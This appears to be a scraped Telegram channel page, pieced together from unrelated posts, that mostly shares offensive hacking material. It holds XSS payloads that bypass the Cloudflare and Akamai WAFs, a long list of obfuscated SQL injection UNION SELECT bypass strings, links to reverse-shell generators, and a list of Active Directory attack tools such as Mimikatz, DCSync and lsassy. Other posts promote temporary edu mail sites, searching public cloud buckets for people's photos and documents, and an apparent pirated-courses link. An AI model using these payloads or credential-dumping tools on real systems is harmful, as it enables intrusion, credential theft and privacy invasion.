Termux All Command [Telegram Group]

🔖 JoeSandbox - Advanced Malware Analysis Tool 🧠 Analyze suspicious files, URLs, documents, and executables across multiple OS platforms (Windows, Linux, macOS, Android, iOS). 🔍 Combines static, dynamic & hybrid analysis for deep threat detection. 🛠️ Widely used by malware analysts, SOC teams & cyber researchers. 🔗 https://www.joesandbox.com

One-Liner - Extract all URLs from the Source Code curl "http://testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'

Lots of Payload online: https://payloadplayground.com/ Reverse Shell Online: https://www.revshells.com/ https://tex2e.github.io/reverse-shell-generator/index.html https://www.invicti.com/learn/reverse-shell/ https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Xss Payload

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;”

bypass XSS Cloudflare WAF Encoded Payload: &#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt; Clean Payload: "><track/onerror='confirm1'> HTML entity & URL encoding: " --> &#34; > --> &gt; < --> &lt; ' --> &#x27; ` --> \%60 #Bypass #XSS #WAF

Bypass SQL union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ ///*!12345UNION SELECT*/// ///*!50000UNION SELECT*/// //UNION///*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un//ion+se//lect uni%0bon+se%0blect %2f%2funion%2f%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ //union//select/**/ //uNIon//sEleCt/**/ +%2F**/+Union/*!select*/ ///*!union*////*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT //union/*!50000select*/// 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% /*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN (/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A///*!50000%55nIOn*//*yoyu*/all//%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!f**U%0d%0aunion*/+/*!f**U%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un//ion+sel//ect+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?<ion sel="">+un//ion+se//lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f%2funion%2f%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ #Bypass #SQL

Akamai WAF bypass XSS <input id=b value=javascrip> <input id=c value=t:aler> <input id=d value=t(1)> <lol           contenteditable           onbeforeinput='location=b.value+c.value+d.value'> click and write here! #WAF #Bypass

🔍 Reconnaissance ✅ Subdomain Enumeration (amass, subfinder, crt.sh) ✅ Port Scanning (nmap, rustscan) ✅ Directory Bruteforcing (ffuf, dirsearch) ✅ Wayback Machine / Archive Recon ✅ JS File Analysis (endpoints, keys, secrets) ✅ ASN/CIDR Discovery ✅ Virtual Host Discovery ✅ Content Discovery (robots.txt, sitemap.xml) ✅ GitHub Dorking (company leaks, tokens) ✅ Search Engine Dorks (Google, Shodan, Censys) ✅ WHOIS & DNS Recon ✅ DNS Zone Transfers 💣 Injection Attacks ✅ SQL Injection (classic, blind, time-based) ✅ Command Injection (OS injection, chained commands) ✅ XML External Entity (XXE) ✅ Server-Side Template Injection (SSTI) ✅ LDAP Injection ✅ CRLF Injection ✅ HTTP Host Header Injection ✅ GraphQL Injection ✅ NoSQL Injection (MongoDB, Firebase abuse) 💥 XSS (Cross-Site Scripting) ✅ Reflected XSS ✅ Stored XSS ✅ DOM-Based XSS ✅ Self-XSS (sometimes still exploitable!) ✅ CSP Bypass Techniques ✅ Mutation XSS ✅ Angular/React/Vue-specific XSS ✅ XSS in SVG/MathML ✅ WAF/Filter Bypass Payloads 🔓 Authentication & Session ✅ Authentication Bypass ✅ 2FA Bypass Techniques ✅ Session Fixation ✅ Session Hijacking ✅ JWT Attacks (none alg, key confusion) ✅ Cookie Poisoning / Tampering ✅ Login CSRF ✅ Password Reset Abuse ✅ Email Enumeration ✅ Username Enumeration ✅ Brute-force/Ratelimiting Bypass ✅ MFA Abuse (fallback channels, reuse) 🔐 Authorization & Access Control ✅ Broken Access Control (BAC) ✅ Insecure Direct Object Reference (IDOR) ✅ Horizontal Privilege Escalation ✅ Vertical Privilege Escalation ✅ Role Confusion / Scope Abuse ✅ Function-level Access Control Flaws ✅ Admin Panel Access via Frontend/API 📂 File Handling & Uploads ✅ Unrestricted File Uploads ✅ Content-Type Validation Bypass ✅ Polyglot Files ✅ SVG Upload with XSS Payload ✅ Upload Path Traversal ✅ Remote File Inclusion (RFI) ✅ Local File Inclusion (LFI) ✅ File Deserialization (PHP, Java, etc.) ✅ ImageTragick (ImageMagick Exploits) 🌐 Web Infrastructure ✅ SSRF (Server-Side Request Forgery) ✅ Open Redirects ✅ CORS Misconfigurations ✅ Clickjacking (X-Frame-Options issues) ✅ Host Header Injection ✅ DNS Rebinding ✅ HTTP Request Smuggling ✅ HTTP Parameter Pollution ✅ Cache Poisoning ✅ Subdomain Takeover ✅ CDN Misconfiguration ✅ Path Traversal (../ abuse) 🔄 Business Logic & API ✅ Logic Flaws (order bypass, payment manipulation) ✅ Race Conditions ✅ Mass Assignment ✅ Insecure API Rate Limiting ✅ Broken Object Level Authorization (BOLA) ✅ GraphQL Misconfig (introspection, object access) ✅ Unprotected Endpoints ✅ Lack of Input Validation (trust boundaries) ✅ Misuse of HTTP Verbs (PUT, DELETE, PATCH) ☁️ Cloud & External Services ✅ AWS/GCP/Azure Misconfig (S3 buckets, secrets) ✅ Leaky Environment Variables ✅ CI/CD Secrets (GitHub Actions, GitLab CI) ✅ Publicly Exposed Dashboards (Kibana, Grafana, Jenkins) ✅ Metadata Services Access (AWS IMDS, GCP metadata) ✅ Exposed .env, .git, .DS_Store, backup files ⚙️ Misc & Advanced ✅ Prototype Pollution ✅ Deserialization Attacks (PHP, Java, Ruby) ✅ WebSocket Hijacking ✅ Caching Bugs (Varnish, NGINX configs) ✅ DNS Cache Poisoning ✅ Frontend Framework Bypasses ✅ CVEs on Outdated Libraries ✅ Supply Chain Attacks ✅ Software-Specific Exploits (WordPress, Magento, etc.) ✅ Secret Discovery (API keys, tokens in source or logs)

Temp Edu Mail https://www.imail.edu.vn/ https://etempmail.com/ https://tempumail.com/ https://edumail.icu/ https://tempmail.vn

Public Buckets Search Amazon Web Services, Digital Ocean Spaces, Google Cloud Platform, Alibaba Cloud, Azure Cloud Storage contain a huge number of publicly available files. For example, by surname, first name or nickname you can find photos of people there. You can also search pdf, office documents, database dumps and more by full name, company name or domain. OsintSh Public Buckets Search online tool: https://osint.sh/buckets/ GrayHat WarFare Public Buckets Search online tool: https://lnkd.in/dUXgeHA5

Make Mobile Apps in minutes! Ai App Builder. https://rork.app/

12 AI tools you need to try in 2025 👇🏻 1. Gemini.ai (Solves anything) 2. Adobefirefly.ai (Text to image) 3. HeyGen.com (Create AI avatar) 4. Midjourney.com (Create art) 5. Topview.ai (Video editing) 6. Pika.art (Text to video) 7. Logodiffusiion.com (Create logos) 8. Jenni.AI (Essay assistant) 9. Zapier.com (Repetitive tasks) 10. Quillbot.com (Rewrite anything) 11. Addy.ai (Write emails) 12. Wordtune.com (Summarise notes) Download Future Tools App today and master AI Tools

All paid courses are now free: 1. Artificial Intelligence 2. Machine Learning 3. Cloud Computing 4. Ethical Hacking 5. Data Analytics 6. AWS Certified 7. Data Science 8. BIG DATA 9. Python 10. MBA Link👇 https://drive.google.com/drive/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD

Bypass payload that worked for me on imperva WAF 😱 Payload: click

Python Programming Roadmap | |-- Fundamentals | |-- Basics of Programming | | |-- Introduction to Python | | |-- Setting Up Development Environment (IDE: PyCharm, VS Code, Jupyter Notebook) | | |-- Running Python Scripts | | | |-- Syntax and Structure | | |-- Basic Syntax | | |-- Variables and Data Types (int, float, str, bool) | | |-- Operators (Arithmetic, Comparison, Logical, Bitwise) | |-- Control Structures | |-- Conditional Statements | | |-- If-Elif-Else Statements | | | |-- Loops | | |-- For Loop | | |-- While Loop | | | |-- Jump Statements | | |-- Break, Continue | | |-- Pass Statement | |-- Functions and Scope | |-- Defining Functions | | |-- Function Syntax | | |-- Parameters and Arguments (Positional, Keyword, Default) | | |-- Return Statement | | | |-- Lambda Functions | | |-- Anonymous Functions | | | |-- Scope and Lifetime | | |-- Local and Global Scope | | |-- Nonlocal Variables | |-- Object-Oriented Programming (OOP) | |-- Basics of OOP | | |-- Classes and Objects | | |-- Methods and Attributes | | | |-- Constructors | | |-- init Method | | |-- Instance Variables | | | |-- Inheritance | | |-- Single and Multiple Inheritance | | |-- Method Resolution Order (MRO) | | | |-- Polymorphism | | |-- Method Overriding | | |-- Operator Overloading | | | |-- Encapsulation and Abstraction | | |-- Private Attributes (using _ and __) | | |-- Properties (Getters and Setters) | |-- Advanced Python | |-- Modules and Packages | | |-- Importing Modules | | |-- Creating and Using Packages | | | |-- Decorators | | |-- Function Decorators | | |-- Class Decorators | | | |-- Generators and Iterators | | |-- Yield Statement | | |-- Custom Iterators | | | |-- Exception Handling | | |-- Try-Except Blocks | | |-- Raising Exceptions | | |-- Custom Exceptions | |-- Data Structures | |-- Lists, Tuples, and Sets | | |-- List Operations and Comprehensions | | |-- Tuple Operations | | |-- Set Operations | | | |-- Dictionaries | | |-- Dictionary Operations | | |-- Dictionary Comprehensions | | | |-- Advanced Data Structures | | |-- Collections Module (Counter, defaultdict, deque) | | |-- Heapq for Priority Queues | |-- Standard Library and Frameworks | |-- Built-in Modules | | |-- math, random, datetime | | |-- os, sys, json | | | |-- Popular Libraries | | |-- NumPy, Pandas for Data Analysis | | |-- Matplotlib, Seaborn for Visualization | | |-- Requests for HTTP | |-- File Handling | |-- File I/O | | |-- Reading and Writing Text Files | | |-- CSV and JSON File Handling | | |-- Working with Directories | |-- Testing and Debugging | |-- Debugging Tools | | |-- pdb (Python Debugger) | | |-- Logging Module | | | |-- Unit Testing | | |-- unittest Framework | | |-- Pytest for Testing | |-- Deployment and DevOps | |-- Version Control with Git | | |-- Integrating Python Projects with GitHub | |-- Continuous Integration/Continuous Deployment (CI/CD) | | |-- Using GitHub Actions or Jenkins | |-- Packaging and Distribution | | |-- Creating Python Packages | | |-- Publishing to PyPI

Red Teamers: 50 Active Directory Commands & Tools You Should Know 1. whoami – Show current user. 2. hostname – Get machine name. 3. net user – List user accounts. 4. net group /domain – Enumerate domain groups. 5. net group "Domain Admins" /domain – Find DA users. 6. net localgroup administrators – Check local admins. 7. nltest /domain_trusts – Discover domain trust paths. 8. nltest /dclist:<domain> – List domain controllers. 9. nltest /dsgetdc:<domain> – Get DC info. 10. set l – View logged-on users. 11. ipconfig /all – Full network config. 12. query user – View active sessions. 13. dir /a – Check hidden files. 14. tasklist /v – Enumerate running processes. 15. whoami /groups – List group memberships. 16. systeminfo – Dump system config. 17. netstat -ano – Active connections. 18. findstr – Filter output for key info. 19. powershell -enc ... – Obfuscated command execution. 20. runas /netonly – Use alternate creds. 21. Get-ADUser – Pull AD user data (with RSAT). 22. Get-ADComputer – Enumerate machines. 23. SharpHound – BloodHound collector. 24. BloodHound – AD privilege path mapping. 25. Mimikatz – Credential extraction tool. 26. Rubeus – Kerberos ticket abuse. 27. Seatbelt – Host recon and enumeration. 28. PowerView – AD recon via PowerShell. 29. SharpView – .NET PowerView port. 30. ADExplorer – GUI view of AD structure. 31. Certify – AD CS abuse. 32. PetitPotam – NTLM relay attack vector. 33. Impacket – Lateral movement & relay tools. 34. crackmapexec – Swiss Army knife for AD. 35. lsassy – Dump LSASS remotely. 36. pypykatz – Python Mimikatz. 37. WMIexec – Command execution via WMI. 38. RPCclient – Query remote services. 39. evil-winrm – Post-exploitation shell. 40. Invoke-ACLScanner – ACL misconfig checks. 41. Invoke-Command – Remote PowerShell execution. 42. Get-SPN – Service Principal Name discovery. 43. Kerberoasting – Dump and crack SPN tickets. 44. ASREPRoasting – Crack AS-REP hash. 45. Invoke-Kerberoast – In-memory Kerberoasting. 46. gpp-decrypt – Decrypt Group Policy creds. 47. SharpKeys – Custom key mapping. 48. Tokenvator – Token manipulation. 49. DCShadow – Fake DC for object injection. 50. DCSync – Dump creds from DC.